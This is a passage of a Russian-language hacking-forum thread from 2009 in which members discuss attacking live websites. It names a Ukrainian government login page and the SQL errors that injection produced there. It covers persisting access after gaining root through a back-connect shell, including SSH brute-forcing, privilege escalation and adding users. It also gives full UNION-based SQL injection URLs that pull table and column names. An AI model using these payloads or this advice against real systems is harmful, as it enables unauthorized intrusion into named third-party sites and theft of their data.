HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.12.2009, 18:24
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Значит патченное ядро.
 
Ответить с цитированием

  #2  
Старый 10.12.2009, 19:03
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...

шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

а так

http://www.pz.gov.ua/login/login.php?lid=-1

ORA-00936: missing expression

это как понимать? один сайт работает на разных БД?
 
Ответить с цитированием

  #3  
Старый 10.12.2009, 19:26
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от 547  
http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...

шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

а так

http://www.pz.gov.ua/login/login.php?lid=-1

ORA-00936: missing expression

это как понимать? один сайт работает на разных БД?

_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
 
Ответить с цитированием

  #4  
Старый 10.12.2009, 20:05
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
ну там еще и мускуль...
 
Ответить с цитированием

  #5  
Старый 10.12.2009, 21:02
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?
 
Ответить с цитированием

  #6  
Старый 10.12.2009, 21:33
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута

Последний раз редактировалось Pashkela; 10.12.2009 в 21:37..
 
Ответить с цитированием

  #7  
Старый 10.12.2009, 21:34
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

мб добавить юзера?

ззы

Pashkela,
Цитата:
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
а по-моему :
Цитата:
Получил рута через бэк-коннект...
уже как бы подразумевает,что у чела рут..не?
 
Ответить с цитированием

  #8  
Старый 10.12.2009, 21:37
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от Pashkela  
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
Я написал что права рута уже есть! Только через cmd, нада сделать чтобы смог подключится через пути (ssh)

Цитата:
Сообщение от $n@ke  
мб добавить юзера?
как?
 
Ответить с цитированием

  #9  
Старый 10.12.2009, 21:38
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

2 $n@ke:

да, я как всегда невмнимателен
 
Ответить с цитированием

  #10  
Старый 10.12.2009, 21:41
R@X
Новичок
Регистрация: 05.10.2008
Сообщений: 8
С нами: 9262575

Репутация: 0
По умолчанию

Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...